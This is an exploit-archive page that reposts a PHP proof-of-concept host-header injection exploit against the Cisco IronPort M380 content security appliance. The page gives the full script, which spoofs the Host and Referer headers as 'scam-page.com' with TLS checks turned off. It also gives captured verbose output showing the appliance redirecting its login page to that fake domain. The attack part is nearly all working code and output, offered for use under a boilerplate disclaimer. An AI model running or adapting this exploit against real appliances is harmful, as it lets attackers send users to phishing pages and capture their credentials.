Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification

Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019090075

Below is a copy:

Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification
<?php
//
//  Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification Demo Exploit
//
//
//  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
//
//
//  Disclaimer:
//  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
//  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
//  caused by direct or indirect use of the  information or functionality provided by these programs. 
//  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
//  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
//  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
//  responsibility.
//   
//  Use them at your own risk!
//
//
//      [test@localhost ironport]$ php -S localhost:1337 ironport_m380.php
//PHP <HIDDEN> Development Server started at Sun Sep  8 16:47:43 2019
//Listening on http://localhost:1337
//Document root is /home/test/ironport
//Press Ctrl-C to quit.
//* About to connect() to 192.168.1.1 port 443 (#0)
//*   Trying 192.168.1.1... * connected
//* Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
//* Initializing NSS with certpath: sql:/etc/pki/nssdb
//* skipping SSL peer certificate verification
//* SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
//* Server certificate:
//* subject: 
//* start date: Mar 19 00:00:00 2018 GMT
//* expire date: Mar 18 23:59:59 2020 GMT
//* common name:   
//* issuer: 
//> GET / HTTP/1.1
//Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
//Cache-Control: no-cache
//Content-Type: application/x-www-form-urlencoded; charset=utf-8
//Host: scam-page.com
//Referer: scam-page.com
//User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
//* HTTP 1.0, assume close after body
//< HTTP/1.0 303 Redirecting
//< Server: glass/1.0 Python/2.6.4
//< Date: Sun, 08 Sep 2019 13:47:59 GMT
//< Content-Type: text/html
//< X-Frame-Options: SAMEORIGIN
//< Set-Cookie: sid=InCkP0xGNg7fyAqL2mAO; expires=Tuesday, 10-Sep-2019 13:47:59 GMT; httponly; Path=/; secure
//< Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
//< Pragma: no-cache
//< Expires: Sun, 08 Sep 2019 13:47:59 GMT
//< Last-Modified: Sun, 08 Sep 2019 13:47:59 GMT
//< Location: https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443&referrer=https%3A%2F%2Fscam-page.com%2FSearch
//< 
//* Closing connection #0
//* About to connect() to 192.168.1.1 port 443 (#0)
//*   Trying 192.168.1.1... * connected
//* Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
//* skipping SSL peer certificate verification
//* SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
//* Server certificate:
//* subject: 
//* start date: Mar 19 00:00:00 2018 GMT
//* expire date: Mar 18 23:59:59 2020 GMT
//* common name:   
//* issuer: 
//> GET / HTTP/1.1
//Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
//Cache-Control: no-cache
//Content-Type: application/x-www-form-urlencoded; charset=utf-8
//Host: scam-page.com
//Referer: scam-page.com
//User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
//* HTTP 1.0, assume close after body
//< HTTP/1.0 303 Redirecting
//< Server: glass/1.0 Python/2.6.4
//< Date: Sun, 08 Sep 2019 13:48:00 GMT
//< Content-Type: text/html
//< X-Frame-Options: SAMEORIGIN
//< Set-Cookie: sid=NPPfo6uXJ5gPbJSPcNDE; expires=Tuesday, 10-Sep-2019 13:48:00 GMT; httponly; Path=/; secure
//< Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
//< Pragma: no-cache
//< Expires: Sun, 08 Sep 2019 13:48:00 GMT
//< Last-Modified: Sun, 08 Sep 2019 13:48:00 GMT
//< Location: https://scam-page.com/login?CSRFKey=32b0b069-34bb-1fdf-9f92-2de72a24cb65&referrer=https%3A%2F%2Fscam-page.com%2FSearch
//< 
//* Closing connection #0
//


$url = "https://192.168.1.1";
$fake_host = "scam-page.com";
$ch = curl_init(); 

curl_setopt($ch, CURLOPT_URL, $url); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_VERBOSE, true);
$headers = [
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Cache-Control: public',
    'Content-Type: application/x-www-form-urlencoded; charset=utf-8',
    'Host: '.$fake_host,
    'Referer: '.$fake_host, 
    'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$output = curl_exec($ch); 
curl_close($ch);
echo $output;
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.